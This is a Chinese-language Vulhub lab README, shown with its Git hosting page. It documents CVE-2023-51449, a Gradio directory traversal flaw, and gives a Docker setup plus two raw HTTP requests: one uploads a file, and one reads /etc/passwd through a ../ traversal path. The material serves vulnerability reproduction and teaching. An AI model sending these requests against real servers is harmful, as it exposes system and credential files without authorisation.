Files
vulhub/gradio/CVE-2023-51449/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
first commit
2025-09-06 16:08:15 +08:00

53 lines
1.7 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Gradio 目录穿越漏洞CVE-2023-51449
Gradio是一个Python库允许用户无需编写前端代码即可为机器学习模型快速构建可视化Web界面。
在 Gradio 4.11 及更早版本中如果未启用身份验证知道文件路径的攻击者可以使用公共URL访问运行Gradio应用程序的服务器上的任意文件。
参考链接:
- <https://github.com/gradio-app/gradio/pull/6833>
- <https://github.com/gradio-app/gradio/security/advisories/GHSA-6qm2-wpxq-7qh2>
## 环境启动
执行如下命令启动一个由Gradio 4.10.0编写的应用:
```
docker compose up -d
```
环境启动后,默认未开启身份验证。你可以通过`http://your-ip:7860`访问该应用。
## 漏洞复现
首先使用upload接口上传任意文件获取一个可访问的文件路径。
```
POST /upload HTTP/1.1
Host: localhost:7860
Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311
-----------------------------250033711231076532771336998311
Content-Disposition: form-data; name="files";filename="okmijnuhbygv"
Content-Type: application/octet-stream
123456
-----------------------------250033711231076532771336998311--
```
![](1.png)
获得可访问的文件路径后利用file接口配合目录穿越即可读取服务器上的任意文件例如`/etc/passwd`
```
GET /file=/tmp/gradio/7c4a8d09ca3762af61e59520943dc26494f8941b/../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: localhost:7860
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36 Edg/100.0.1185.36
Connection: close
Accept-Encoding: gzip
```
![](2.png)